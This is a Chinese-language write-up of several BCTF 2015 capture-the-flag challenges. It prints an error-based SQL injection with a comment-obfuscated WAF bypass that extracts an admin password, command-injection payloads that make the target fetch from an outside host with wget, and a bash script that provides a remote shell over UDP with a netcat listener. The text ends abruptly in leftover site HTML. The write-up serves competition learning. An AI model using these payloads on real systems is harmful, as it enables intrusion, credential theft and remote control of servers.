BCTF是由蓝莲花战队举办的网络安全夺旗挑战赛,去年只面向国内,从今年开始,我们将向全世界开放,欢迎全球各地的小伙伴们参加!我们将为优胜者提供奖励。

今年的BCTF也是全国网络安全技术对抗联赛XCTF的分站赛之一,获胜的中国XCTF队伍将直接晋级南京的XCTF总决赛(决赛也由蓝莲花战队命题)。其他参赛的XCTF队伍也将获得积分,来竞争XCTF决赛的其他席位。

2015年战况:217, PPP 和 tomcr00se赢得了前三。

bctf2015

主要有下面一些题目

bcft

Checkin 10

Desc: Please checkin at IRC

IRC: https://webchat.freenode.net/ Channels: bctf

Bulletin board:

[BCTF 2015 has started. Check in flag: OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx}.

Rot13 decode:

OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx} <--> BCTF{we1c0me-t0-BCTF-2015_g00d-luck} Sqli_engineScore 200

c334041bgw1eqehdrsxq4j20j40cndgr

sqli_engine

Desc:

https://104.197.7.111:8080/

geohot told me he has a lot of sql injection tricks. So I wrote a sql injection detection engine in defense.

Now you have a simple website protected by my engine, try to steal the admin’s password(not hash).

Username, Password ::: SQLi

<form id="submit-form" class="form-group" action="/register" method="POST"> <input type="text" placeholder="username" class="form-control" name="username"/> <input type="password" placeholder="password" class="form-control" name="password"/> <span class="input-icon fui-check-inverted"></span> <br /> <p class="row"> <p class="col-xs-3"> <button type="submit" class="btn btn-block btn-lg btn-primary">Register</button> </p> Already registered?<a href="/static/login.html">Click Here to Login</a> </p> <br /> </form

SQL Injection:

URL: https://104.197.7.111:8080/register POST: username=admin&password=,' error executing sql: insert into users (username, password) values ('admin', ','') (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '','')' at line 1")

Continue:

Continue: username=admin\&password=,updatexml(1,(select password from users limit 1),1) or ' password contains SQL injection, IP recorded.

Bypass WAF:

username=admin\&password=,updatexml(1,(/*/*/select password from/*/*/users limit/*/*/1),1) or/*/*/' (1105, "XPATH syntax error: '{h0w-d1d-y0u-fee1-l1ke-th3-sql1-'")

Substring right:

username=admin\&password=,updatexml(1,(/*/*/select right(password,33)/*/*/from/*/*/users limit/*/*/1),1) or/*/*/' (1105, "XPATH syntax error: 'd-y0u-fee1-l1ke-th3-sql1-eng1ne}'")

String concatenation (FLAG):

{h0w-d1d-y0u-fee1-l1ke-th3-sql1-eng1ne} Torrent_loverScore 233

Desc: A dog loves torrent.

c334041bgw1eqegar7st4j20ac03sdfz

c334041bgw1eqegb9eahij20a502gq2y

https://218.2.197.253/zhongzi/index.php:

c334041bgw1eqegc3043aj20ex0b13zl

We guess, Maybe the command execution, The program calls the system function? Because we have no other way. 

:-(

Testing:

https://www.google.com/`wget worm.cc:8000`/1.torrent https://www.google.com/`wget${IFS}worm.cc:8000`/1.torrent

We have received req (404):

root@e:/rootkit# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 118.186.202.142 - - [22/Mar/2015 13:44:39] "GET / HTTP/1.1" 200 - 118.186.202.142 - - [22/Mar/2015 13:44:41] code 404, message File not found

ubd.sh:

#!/bin/bash exec 9<> /dev/udp/localhost/8088 [ $? -eq 1 ] && exit echo "connect ok" >&9 while : do a=`dd bs=200 count=1 <&9 2>/dev/null` if echo "$a"|grep "exit"; then break; fi echo `$a` >&9 done exec 9>&- exec 9<&-

nc -lu 8088

c334041bgw1eqegkzZ喎 <script src='/plus/ad_js.php?aid=8892' language='javascript'></script></DIV>
      </ARTICLE>
            </SECTION>
    <div>
              
			  <div class= 版权声明:本文由懒人源码屋技术人员研究整理的智慧结晶,转载勿用于商业用途,并保留本文链接,侵权必究!本站专注于源码分享